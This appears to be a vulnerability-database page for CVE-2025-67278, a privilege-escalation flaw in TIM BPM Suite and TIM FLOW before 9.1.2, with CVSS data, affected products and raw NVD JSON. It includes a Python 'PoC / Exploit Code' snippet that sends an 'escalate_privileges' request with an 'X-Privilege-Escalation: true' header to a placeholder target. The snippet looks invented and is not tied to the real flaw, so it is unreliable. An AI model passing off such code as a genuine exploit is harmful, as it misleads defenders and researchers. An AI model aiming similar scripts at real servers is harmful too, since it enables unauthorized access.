Security Vulnerability Report
中文
CVE-2025-67278 CVSS 6.5 MEDIUM

CVE-2025-67278

Published: 2026-01-09 16:16:07
Last Modified: 2026-01-22 21:29:32

Description

An issue in TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 allows a remote attacker to escalate privileges via a crafted HTTP request

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:* - VULNERABLE
TIM BPM Suite < 9.1.2
TIM FLOW < 9.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-67278 PoC - Privilege Escalation in TIM BPM Suite & TIM FLOW target_url = "http://target-server.com/tim-bpm/api" # Crafted HTTP request for privilege escalation headers = { "User-Agent": "Mozilla/5.0", "X-Privilege-Escalation": "true", "Content-Type": "application/json" } payload = { "action": "escalate_privileges", "user_id": "attacker_controlled_id", "target_role": "administrator" } response = requests.post(target_url, json=payload, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {response.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67278", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:07.163", "lastModified": "2026-01-22T21:29:32.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 allows a remote attacker to escalate privileges via a crafted HTTP request"}, {"lang": "es", "value": "Un problema en TIM Solution GmbH TIM BPM Suite y TIM FLOW anterior a la v.9.1.2 permite a un atacante remoto escalar privilegios mediante una solicitud HTTP manipulada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.2", "matchCriteriaId": "071D6670-88DB-4539-A1F9-1850251BDD53"}]}]}], "references": [{"url": "https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}